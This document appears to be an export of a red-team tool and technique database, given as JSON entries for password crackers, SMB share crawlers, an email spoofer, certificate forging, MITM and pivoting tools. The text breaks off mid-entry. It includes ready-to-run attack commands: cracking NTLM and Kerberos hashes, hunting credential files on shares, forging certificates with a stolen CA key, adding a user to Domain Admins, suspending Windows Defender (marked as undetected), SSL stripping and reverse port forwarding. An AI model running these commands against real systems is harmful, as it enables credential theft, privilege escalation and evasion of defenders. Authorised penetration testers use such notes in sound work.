New tool: John the Ripper

{
  "name": "John the Ripper",
  "phases": [
    "02. Reconnaissance",
    "08. Credentials & User Impersonation"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Linux"
  ],
  "source": "https://www.openwall.com/john/",
  "description": "John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.",
  "undetected": [],
  "detected": [],
  "content": "# John the Ripper\n\n\n## [[Crack Credentials]]\nCracking netntlmv2\n'''sh\njohn --format=netntlmv2 --wordlist=wordlist svc_mssql-netntlmv2\n'''\n\n\n",
  "commands": [
    {
      "id": "ff58951f-1f3f-4ba1-b0de-a11fe3a78740",
      "name": "Cracking netntlmv2",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "john --format=netntlmv2 --wordlist=wordlist svc_mssql-netntlmv2"
    },
    {
      "id": "2d47de76-3f5c-4fc6-8aae-e2df72708d60",
      "name": "Cracking Secretsdump",
      "description": "",
      "tag": "",
      "results": [
        "CRED:PASS:PLAIN"
      ],
      "cmd": "john --format=mscash2 --wordlist=/root/mydict.txt /root/2crack.txt"
    }
  ]
}

New tool: Espoofer

{
  "name": "Espoofer",
  "phases": [
    "01. Initial Access",
    "08. Credentials & User Impersonation"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Python"
  ],
  "source": "https://github.com/chenjj/espoofer",
  "description": "An email spoofing testing tool that aims to bypass SPF/DKIM/DMARC and forge DKIM signatures.🍻",
  "undetected": [],
  "detected": [],
  "content": "\n## [[Internal Phishing]][[Phishing]]\nChecking for spoofable header\n\n",
  "commands": [
    {
      "id": "2e5b14fc-a885-49d1-9c5f-2f8f04290901",
      "name": "Install",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "git clone https://github.com/chenjj/espoofer\nsudo pip3 install -r requirements.txt"
    }
  ]
}

New tool: reg

{
  "name": "reg",
  "phases": [
    "03. Host Enumeration"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows"
  ],
  "source": "Windows",
  "description": "Registry queries for host enumeration",
  "undetected": [],
  "detected": [],
  "content": "\n## [[PowerShell Logging]]\n#get_powershell_logging\n'''ps\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription\n\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging\n\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\n'''\n\n## [[PowerShell-Version]]\n'''ps\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowershellEngine /v PowershellVersion\n\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowershellEngine /v PowershellVersion\n\nGet-ItemPropertyValue HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\*\\PowerShellEngine -Name PowerShellVersion\n'''\n\nTranscription policy values under the PowerShell Core and Windows PowerShell policy keys:\n'''ps\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShellCore\\Transcription\n\"EnableTranscripting\"=dword:00000001\n\"OutputDirectory\"=\"c:\\windows\\temp\\pstranscripts\"\n\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription\n\"EnableTranscripting\"=dword:00000001\n\"OutputDirectory\"=\"c:\\windows\\temp\\pstranscripts\"\n'''",
  "commands": [
    {
      "id": "f74abf51-9446-4701-a3ab-7077a6602a88",
      "name": "PowerShell Logging",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging"
    },
    {
      "id": "a59f2da6-d883-4cb3-ad3e-65085418256e",
      "name": "PowerShell Versions",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowershellEngine /v PowershellVersion\n\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowershellEngine /v PowershellVersion\n\nGet-ItemPropertyValue HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\*\\PowerShellEngine -Name PowerShellVersion"
    },
    {
      "id": "28ffd6e0-476f-450c-a4cb-196f247d22d7",
      "name": "SafeDllSearchMode",
      "description": "If enabled (the default), the current working directory is searched after the system directories, so a DLL present in System32 is loaded instead of one in the local directory",
      "tag": "",
      "results": [],
      "cmd": "reg query \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\" /v SafeDllSearchMode"
    }
  ]
}

New tool: MANSPIDER

{
  "name": "MANSPIDER",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Python"
  ],
  "source": "https://github.com/blacklanternsecurity/MANSPIDER",
  "description": "Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!",
  "undetected": [],
  "detected": [],
  "content": "## Installation\n'''sh\n# (Optional) Install these dependencies to add additional file parsing capability:\n# for images (png, jpeg)\n$ sudo apt install tesseract-ocr\n\n# for legacy document support (.doc)\n$ sudo apt install antiword\n\n# Install manspider (please be patient, this can take a while):\n$ pip install pipx\n$ pipx install git+https://github.com/blacklanternsecurity/MANSPIDER\n'''\n\n## [[Credentials]]\nSearch the network for filenames that may contain creds\n>manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u admin -p password\n\nSearch for XLSX files containing \"password\"\n>manspider share.evil.corp -c password -e xlsx -d evilcorp -u admin -p password\n\nSearch for interesting file extensions\n> manspider share.evil.corp -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config -d evilcorp -u admin -p password\n\n",
  "commands": [
    {
      "id": "e15907bc-e26c-4462-b8c5-ed5a740917eb",
      "name": "Install",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "sudo apt install tesseract-ocr\nsudo apt install antiword\npip install pipx\npipx install git+https://github.com/blacklanternsecurity/MANSPIDER"
    },
    {
      "id": "a562be37-6d72-4372-adbc-b78eee0a91a4",
      "name": "Search the network for filenames that may contain creds",
      "description": "",
      "tag": "",
      "results": [
        "CRED:PASS:PLAIN"
      ],
      "cmd": "manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u admin -p password"
    },
    {
      "id": "6027516d-5e31-4074-9042-a44723327416",
      "name": "Search for XLSX files containing \"password\"",
      "description": "",
      "tag": "",
      "results": [
        "CRED:PASS:PLAIN"
      ],
      "cmd": "manspider share.evil.corp -c password -e xlsx -d evilcorp -u admin -p password"
    },
    {
      "id": "6b5dc298-ee54-4b8f-be54-7843b7ff873c",
      "name": "Search for interesting file extensions",
      "description": "",
      "tag": "",
      "results": [
        "CRED:PASS:PLAIN"
      ],
      "cmd": "manspider share.evil.corp -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config -d evilcorp -u admin -p password"
    }
  ]
}

New tool: dnsrecon

{
  "name": "dnsrecon",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "OSINT",
  "stealthy": false,
  "platforms": [
    "Python"
  ],
  "source": "https://github.com/darkoperator/dnsrecon",
  "description": "DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.",
  "undetected": [],
  "detected": [],
  "content": "\n## [[DNS]]\nEnumerate DNS\n\n",
  "commands": [
    {
      "id": "56135c43-1def-4d31-80ba-2f00042555b8",
      "name": "Base domain enumeration",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "dnsrecon -d www.acme.com"
    },
    {
      "id": "59b387be-ae9c-4bda-8c05-e8c9a92faa45",
      "name": "Base domain enum to SQL",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "dnsrecon -d www.acme.com --db /path/to/sqllite.file"
    },
    {
      "id": "ddc7f920-b894-4b73-abc1-aa473288b980",
      "name": "Zone walking",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "dnsrecon -d www.acme.com -t zonewalk"
    },
    {
      "id": "19b43fa4-ebd8-4856-9aec-640afe215bba",
      "name": "Brute-forcing of domains",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "dnsrecon -d www.acme.com -D /path/to/dict.txt -t brt"
    },
    {
      "id": "88e7859d-2e6c-483a-ad2d-7c9d9376f74b",
      "name": "Reverse lookup",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "dnsrecon -r 208.67.222.200-208.67.222.255 -d microsoft.com\n"
    }
  ],
  "references": [
    "https://www.kali.org/tools/dnsrecon/#:~:text=DNSRecon%20is%20a%20Python%20script,Perform%20common%20SRV%20Record%20Enumeration"
  ]
}

New technique: Local User+Groups

{
  "id": "c7bf893c-5d7c-4177-9a5a-5a8828672770",
  "name": "Local User+Groups",
  "phase": "03.Host Enumeration",
  "ttp": "T1069.001",
  "external": false,
  "description": "Identify local groups",
  "content": "## Tools\n########\n########",
  "category": "",
  "stealthy": false,
  "changes": [
    "\n## [[mmc]]\nLaunch mmc.exe, click File > Add\\remove snap-in > Local users and Groups",
    "\n## [[Net]]\n1. Create User:\n '''bash\n net user Patrick patrick12345! /ADD /DOMAIN\n '''\n2. List local / domain groups\n '''bash\n net group /domain\n\n Gruppenkonten für \\\\dc1.testdomain.local\n -------------------------------------------------------------------------------\n *$7O...\n *Abteilung_....\n *Domänen-Admins\n \n net localgroup [group (Remote Desktop Users)]\n '''\n3. Add User to domain /local group\n '''sh\n net group \"Domänen-Admins\" Patrick /add /domain\n\n net localgroup \"Remote Desktop Users\" Patrick /add\n net localgroup \"Administrators\" Patrick /add\n '''",
    "\n## [[wmic]]\nGet local user accounts\n'''cmd\nwmic useraccount list\n'''"
  ],
  "tools": [
    "mmc",
    "Net",
    "wmic"
  ],
  "steps": [
    {
      "id": "022f5b3b-423a-4419-872d-75d644b18c4c",
      "name": "Identify local user",
      "description": "",
      "requirements": "",
      "results": "localuser"
    },
    {
      "id": "f552eb3c-c133-4bd3-ab11-f526e490bf11",
      "name": "Identify local group",
      "description": "",
      "requirements": "",
      "results": "localgroup"
    }
  ]
}

New tool: ForgeCert

{
  "name": "ForgeCert",
  "phases": [
    "02. Reconnaissance",
    "08. Credentials & User Impersonation"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows"
  ],
  "source": "https://github.com/GhostPack/ForgeCert",
  "description": "Generate certs",
  "undetected": [],
  "detected": [],
  "content": "# ForgeCert\n\n## [[Forged Certificates]]\nGenerate a certificate with a stolen CA private key\n'''beacon\nC:\\Users\\Administrator\\Desktop>C:\\Tools\\ForgeCert\\ForgeCert\\bin\\Debug\\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword \"password\" --Subject \"CN=User\" --SubjectAltName \"[email protected]\" --NewCertPath fake.pfx --NewCertPassword \"password\"\nCA Certificate Information:\n  Subject:        CN=ca-1, DC=evil, DC=corp\n  Issuer:         CN=ca-1, DC=evil, DC=corp\n  Start Date:     2/25/2022 11:29:14 AM\n  End Date:       2/25/2047 11:39:08 AM\n  Thumbprint:     7F8A1EFB7A50E2D1DE098085301926AA13AE0A71\n  Serial:         31AC83C6678F28994CFB58207C9FB668\n\nForged Certificate Information:\n  Subject:        CN=User\n  SubjectAltName: [email protected]\n  Issuer:         CN=ca-1, DC=evil, DC=corp\n  Start Date:     3/1/2022 2:19:20 PM\n  End Date:       3/1/2023 2:19:20 PM\n  Thumbprint:     73C45EC22357C0451E0F374AC30B5C6F6034B132\n  Serial:         009E1C0AE8A247695199F8157DB37E38AD\n\nDone. Saved forged certificate to fake.pfx with the password 'password'\n'''\n\n",
  "commands": [
    {
      "id": "769c8351-fac6-43a1-abf8-e5ddcf6630d7",
      "name": "Forge Cert with PK",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword \"password\" --Subject \"CN=User\" --SubjectAltName \"[email protected]\" --NewCertPath fake.pfx --NewCertPassword \"password\""
    }
  ]
}

New tool: GoWitness

{
  "name": "GoWitness",
  "phases": [
    "02. Reconnaissance",
    "06. Domain Enumeration"
  ],
  "category": "",
  "stealthy": true,
  "platforms": [
    "Linux"
  ],
  "source": "https://github.com/sensepost/gowitness",
  "description": "Pictures of webservers",
  "undetected": [],
  "detected": [],
  "content": "\n## [[Find Web Server]]\nScan internal network\n* Screenshot a single website  \n> gowitness single https://www.google.com/\n* Screenshot a cidr using 20 threads  \n> gowitness scan --cidr 192.168.0.0/24 --threads 20\n* Scan based on Nessus scan\n> .\\gowitness-2.4.0-windows-amd64.exe nessus -f .\\ScanniSceneroni_xm6g2a.nessus\n* Scan based on URL/IP file\n> .\\gowitness-2.4.0-windows-amd64.exe file -f '.\\External Pentesting\\urls.txt'\n* Screenshot open http services from an nmap file  \n> gowitness nmap -f nmap.xml --open --service-contains http\n* Run the report server  \n> gowitness report serve\n\n",
  "commands": [
    {
      "id": "78c1f2ef-d03b-4d0e-af0c-63566fe1733b",
      "name": "Screenshot a single website",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "gowitness single https://www.google.com/"
    },
    {
      "id": "2683dac7-4a17-4e8b-b069-8332b5df95d9",
      "name": "Screenshot a cidr using 20 threads",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "gowitness scan --cidr 192.168.0.0/24 --threads 20"
    },
    {
      "id": "0564da3e-27bf-4b2a-8fa0-48aeed967903",
      "name": "Scan based on Nessus scan",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": ".\\gowitness-2.4.0-windows-amd64.exe nessus -f .\\ScanniSceneroni_xm6g2a.nessus"
    },
    {
      "id": "966b5f10-0d75-4aeb-aae8-442a9d97e8fe",
      "name": "Scan based on URL/IP file",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": ".\\gowitness-2.4.0-windows-amd64.exe file -f 'urls.txt'"
    },
    {
      "id": "635a546b-c13d-459b-a173-7230bcb506bb",
      "name": "Screenshot open http services from an nmap file",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "gowitness nmap -f nmap.xml --open --service-contains http"
    },
    {
      "id": "e5a98439-d851-45e1-9047-2b36877d7c6d",
      "name": "Run the report server",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "gowitness report serve"
    }
  ]
}

New tool: PsSuspend

{
  "name": "PsSuspend",
  "phases": [
    "10. Bypassing Defenses"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Windows"
  ],
  "source": "https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend",
  "description": "PsSuspend lets you suspend processes on the local or a remote system, which is desirable in cases where a process is consuming a resource (e.g. network, CPU or disk) that you want to allow different processes to use. Rather than kill the process that's consuming the resource, suspending permits you to let it continue operation at some later point in time.",
  "undetected": [
    "MDE",
    "Windows Defender (AV)"
  ],
  "detected": [],
  "commands": [
    {
      "id": "92efd3ca-227b-4f76-927a-e3a6d0cdd04b",
      "name": "Suspend process",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "pssuspend.exe msmpeng.exe"
    }
  ],
  "content": ""
}

New tool: ssh

{
  "name": "ssh",
  "phases": [
    "00. Infrastructure"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Linux",
    "Windows"
  ],
  "source": "n/a",
  "description": "SSH or Secure Shell is a network communication protocol that enables two computers to communicate (c.f http or hypertext transfer protocol, which is the protocol used to transfer hypertext such as web pages) and share data.",
  "undetected": [],
  "detected": [],
  "content": "# SSH\n\n## Pivoting\n\n### Portforwarding\nConnect to root@<REMOTE> with the private key foo.pem.\nRemote port forward: open port 81 on the target and forward connections to it back to port 80 on the attacker machine.\n-f: background the SSH connection\n-N: do not execute a remote command\n'''sh\nssh -i foo.pem root@<REMOTE> -R 81:localhost:80 -f -N\n'''\n\n",
  "commands": [
    {
      "id": "dcf7b938-00ef-4494-a659-876b100e9b25",
      "name": "Portforwarding",
      "description": "Remote port forward: open port 81 on the target and forward connections to it back to port 80 on the attacker machine\n-f: background the SSH connection\n-N: do not execute a remote command",
      "tag": "",
      "results": [],
      "cmd": "ssh -i foo.pem root@<REMOTE> -R 81:localhost:80 -f -N"
    }
  ]
}

New tool: socat

{
  "name": "socat",
  "phases": [
    "00. Infrastructure"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Linux",
    "Windows"
  ],
  "source": "http://www.dest-unreach.org/socat/",
  "description": "socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. \nThese modes include generation of \"listening\" sockets, named pipes, and pseudo terminals.",
  "undetected": [],
  "detected": [],
  "content": "## Redirect TCP traffic\n'''\nsocat TCP4-LISTEN:80,fork TCP4:<REMOTE>:80\n'''\n\n\n",
  "commands": [
    {
      "id": "2eb8949c-105e-424b-aa63-e93072a9d653",
      "name": "Forward TCP4 traffic",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "socat TCP4-LISTEN:80,fork TCP4:<REMOTE>:80"
    }
  ]
}

New tool: qwinsta/quser

{"name":"qwinsta/quser","phases":["03.Host Enumeration"],"requirements":[],"results":[],"category":"","opsec":false,"path":"","oss":["Windows"],"source":"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/qwinsta","description":"Available on Windows servers; requires local admin on target machines.\n\nList logged in users\nqwinsta/quser /server:myremote.server","undetected":[],"detected":[]}

New tool: Process Monitor

{
  "name": "Process Monitor",
  "phases": [
    "01. Initial Access",
    "04. Persistence"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows",
    "Linux"
  ],
  "source": "https://docs.microsoft.com/en-us/sysinternals/downloads/procmon",
  "description": "Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.",
  "undetected": [],
  "detected": [],
  "content": "# Process Monitor\n\n## [[COM Hijacking]]\nFind COM hijacks\n[Process Monitor](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) shows real-time file system, registry and process activity and is very useful in finding different types of privilege escalation primitives.\n\nDue to the sheer number of events generated, filtering is essential to find the ones of interest. We're looking for:\n\n-   **RegOpenKey** operations.\n-   where the _Result_ is **NAME NOT FOUND**.\n-   and the _Path_ ends with **InprocServer32**.\n ![](/Images/Hunting-com.png)\n\nVerify that the entry does exist in HKLM, but not in HKCU.\n>Get-Item -Path \"HKLM:\\Software\\Classes\\CLSID\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\InprocServer32\"\n\n\n",
  "commands": [
    {
      "id": "97d6f0d7-8443-41d6-864f-81a8fa73d87c",
      "name": "Filter for DLL Hijacking CLSID",
      "description": "Filter + verify that the entry does exist in HKLM, but not in HKCU",
      "tag": "",
      "results": [],
      "cmd": "Operations = RegOpenKey\nResult = NAME NOT FOUND\nPath ENDSWITH InprocServer32\n\nGet-Item -Path \"HKLM:\\Software\\Classes\\CLSID\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\InprocServer32\""
    },
    {
      "id": "e0a00380-bfe4-47de-aae5-b911ea654ee2",
      "name": "Filter for DLL Search-Order-Hijacking",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Path ENDSWITH .dll\nResult = NAME NOT FOUND\nProcess Name CONTAINS <processname>"
    }
  ]
}

New tool: dig

{"name":"dig","phases":["02.Reconnaissance"],"requirements":[],"results":[],"category":"","opsec":false,"path":"","oss":["Linux"],"source":"https://linux.die.net/man/1/dig","description":"DNS lookup utility\n\ndig @nameserver name recordtype\n\ne.g.\n\ndig @1.1.1.1 myevildoma.in A\n\nVia SOCKS proxy:\nUse +tcp and +vc options to perform DNS requests via TCP.\n","undetected":[],"detected":[]}

Add helpful command to powershell

Get-MpThreatDetection | sort InitialDetectionTime | select -First 1

AppLocker
HKey_Local_Machine\Software\Policies\Microsoft\Windows\SRPV2
HKey_Local_Machine\System\CurrentControlSet\Control\SRP\GP

WDAC
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard -v DeployConfigCIPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard -v ConfigCIPolicyFilePath

New tool: Bettercap

{
  "name": "Bettercap",
  "phases": [
    "02. Reconnaissance",
    "08. Credentials & User Impersonation"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Linux"
  ],
  "source": "https://github.com/bettercap/bettercap",
  "description": "A suite for man in the middle attacks",
  "undetected": [],
  "detected": [],
  "content": "Bettercap\n---------\n\n[https://www.bettercap.org/usage/](https://www.bettercap.org/usage/)\n\nMitM with [sslstrip](sslstrip_1297023162.html)\n\n(May not work because of HSTS and the preload list containing websites that need to be HTTPS even on first connect)\n\n## [[08.Credentials & User Impersonation/MITM]]\n'''sh\nbettercap -G 192.168.1.1 -T 192.168.1.102 --proxy-https\n'''\n\n\n",
  "commands": [
    {
      "id": "aae91a7b-6ae0-4c0b-b3d5-1298930bfe14",
      "name": "MITM with SSL Stripping",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "bettercap -G 192.168.1.1 -T 192.168.1.102 --proxy-https"
    }
  ]
}

New tool: enum4linux

{
  "name": "enum4linux",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Linux"
  ],
  "source": "https://github.com/CiscoCXSecurity/enum4linux",
  "description": "enum4linux is a Linux alternative to enum.exe for enumerating data from Windows and Samba hosts",
  "undetected": [],
  "detected": [],
  "content": "\n## [[Guest Access (SMB)]]\n> enum4linux -a -u \"\" -p \"\" <dc-ip>  \n> enum4linux -a -u \"guest\" -p \"\" <dc-ip>  \n\n## [[User enum]]\n> enum4linux -U <dc-ip> | grep 'user:'\n\n",
  "commands": [
    {
      "id": "3b2630cc-65ab-4928-b46d-fc3f404c9283",
      "name": "Commands",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Usage: ./enum4linux.pl [options] ip\n\nOptions are (like \"enum\"):\n    -U        get userlist\n    -M        get machine list*\n    -S        get sharelist\n    -P        get password policy information\n    -G        get group and member list\n    -d        be detailed, applies to -U and -S\n    -u user   specify username to use (default \"\")  \n    -p pass   specify password to use (default \"\")"
    }
  ],
  "references": [
    "https://www.kali.org/tools/enum4linux/#:~:text=Enum4linux%20is%20a%20tool%20for,%2C%20rpclient%2C%20net%20and%20nmblookup"
  ]
}

New tool: Hashcat

{
  "name": "Hashcat",
  "phases": [
    "02. Reconnaissance",
    "08. Credentials & User Impersonation"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Linux"
  ],
  "source": "https://hashcat.net/hashcat/",
  "description": "World's fastest password cracker\nWorld's first and only in-kernel rule engine",
  "undetected": [],
  "detected": [],
  "content": "# Hashcat\n\n\n## Commands\n- '-a 0' specifies the wordlist attack mode.\n- '-m 1000' specifies that the hash is NTLM.\n- 'C:\\Temp\\ntlm.txt' is a text file containing the NTLM hash to crack.\n- 'D:\\Tools\\rockyou.txt' is the wordlist.\n- '-r rules\\add-year.rule' is our custom rule file.\n\n## Bruteforce NTLM\n- '-a 3' specifies the mask attack.\n- '?u?l?l?l?l?l?l?l?d' is the mask.\n\n| ?   | Charset                                |\n| --- | -------------------------------------- |\n| l   | abcdefghijklmnopqrstuvwxyz             |\n| u   | ABCDEFGHIJKLMNOPQRSTUVWXYZ             |\n| d   | 0123456789                             |\n| h   | 0123456789abcdef                       |\n| H   | 0123456789ABCDEF                       |\n| s   | '!\"#$%&'()*+,-./:;<=>?@[\\]^_''{ \\| }~' |\n| a   | ?l?u?d?s                               |\n| b   | 0x00 - 0xff                            |\n\n## [[Crack Credentials]]\n## Cracking NTLM\n'''sh\nhashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 1000 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt\n'''\n\n'''beacon\nhashcat.exe -a 3 -m 1000 C:\\Temp\\ntlm.txt ?u?l?l?l?l?l?l?l?d\n'''\n\n## Cracking krb5tgs\n'''sh\nhashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 13100 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt\n'''\n\n## Cracking krb5asrep\n'''sh\nhashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 18200 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt\n'''\n\n## Cracking netntlmv2\n'''sh\nhashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 5600 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt\n'''\n\n\n",
  "commands": [
    {
      "id": "4dcdc386-2ceb-431c-acf6-a9c2d55130e9",
      "name": "Cracking NTLM",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "hashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 1000 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt"
    },
    {
      "id": "e2ec4a29-5912-4fec-8b42-339a639391a7",
      "name": "Bruteforce NTLM",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": ""
    },
    {
      "id": "da7d5aea-fb2f-411d-bc82-b59f1c96a552",
      "name": "Cracking krb5tgs",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "hashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 13100 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt"
    },
    {
      "id": "742234d5-3e4a-4261-b2b7-dad52e4200ae",
      "name": "Cracking krb5asrep",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "hashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 18200 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt"
    },
    {
      "id": "2ae08370-f66a-4fac-bad8-da25f0af8ed9",
      "name": "Cracking netntlmv2",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "hashcat.exe -w 3 -r /rules/oneruletorulethemall -a 0 -m 5600 ntlm.txt C:\\Temp\\ntlm.txt D:\\Tools\\rockyou.txt"
    },
    {
      "id": "64f215f3-7434-44fc-8dc1-2118e7db6a1c",
      "name": "Bruteforce Rules",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "-a 3 specifies the mask attack.\n?u?l?l?l?l?l?l?l?d is the mask.\n\n?\tCharset\n------------------------\nl\tabcdefghijklmnopqrstuvwxyz\nu\tABCDEFGHIJKLMNOPQRSTUVWXYZ\nd\t0123456789\nh\t0123456789abcdef\nH\t0123456789ABCDEF\ns\t!\"#$%&'()*+,-./:;<=>?@[\\]^_''{ | }~\na\t?l?u?d?s\nb\t0x00 - 0xff"
    }
  ]
}

New technique: Diamond Ticket

{
  "id": "385824c8-406e-47c8-a45c-8c5136415294",
  "phase": "08. Credentials & User Impersonation",
  "ttp": "T1558",
  "external": false,
  "description": "A Diamond PAC is an attacker-crafted PAC signed with a stolen KRBTGT key. It can be used to assign high privileges to a user's access request, regardless of the user's original permissions.\nIn contrast to the Golden Ticket attack, which also uses a stolen KRBTGT key to obtain high privileges, the Diamond PAC attack does not craft a full Kerberos ticket; it uses the standard Kerberos flow (in the same manner as the MS14-068 exploit) to inject the crafted Diamond PAC.\nThe Diamond PAC attack is therefore a more subtle version of the Golden Ticket attack and harder to detect. Detection rules that catch Golden Ticket attacks through the Kerberos traffic anomaly they create (a user sending a valid TGS request with no prior AS request to obtain a TGT) will not alert on the Diamond PAC attack.",
  "category": "",
  "stealthy": false,
  "tools": [],
  "changes": [],
  "name": "Diamond Ticket",
  "content": "",
  "steps": [
    {
      "id": "aee6a7d0-a9f3-476d-8965-baa349b6c78d",
      "name": "Get the KRBTGT",
      "description": "",
      "requirements": {},
      "results": [
        "CRED:HASH:KRBTGT"
      ]
    },
    {
      "id": "fcc5d1d5-1d28-4993-90c6-65e083f75ef1",
      "name": "Get the TGTs authentication time",
      "description": "",
      "requirements": {},
      "results": [
        "CRED:TICKET:TGT"
      ]
    },
    {
      "id": "90ec2fb0-6626-4ff8-9e65-de3ceb4f5db8",
      "name": "Get the SID of current domain",
      "description": "",
      "requirements": {},
      "results": [
        "INTEL:DOMAIN:SID"
      ]
    },
    {
      "id": "37bd25df-c486-44ed-b6a1-cc8928e598ed",
      "name": "Generate diamond ticket",
      "description": "",
      "requirements": {
        "and": [
          {
            "tag": "CRED:HASH:KRBTGT"
          },
          {
            "tag": "CRED:TICKET:TGT"
          },
          {
            "tag": "INTEL:DOMAIN:SID"
          }
        ]
      },
      "results": [
        "CRED:TICKET:TGT:DIAMOND"
      ]
    }
  ]
}

New tool: linedInt

{
  "name": "linedInt",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "OSINT",
  "stealthy": false,
  "platforms": [
    "Python"
  ],
  "source": "https://github.com/vysecurity/LinkedInt",
  "description": "LinkedIn Recon Tool",
  "undetected": [],
  "detected": [],
  "content": "\n## [[LinkedIn]]\n\n",
  "commands": [
    {
      "id": "f570a99e-7685-4e71-9287-d7af8adfb4ea",
      "name": "Install",
      "description": "",
      "tag": "",
      "results": [],
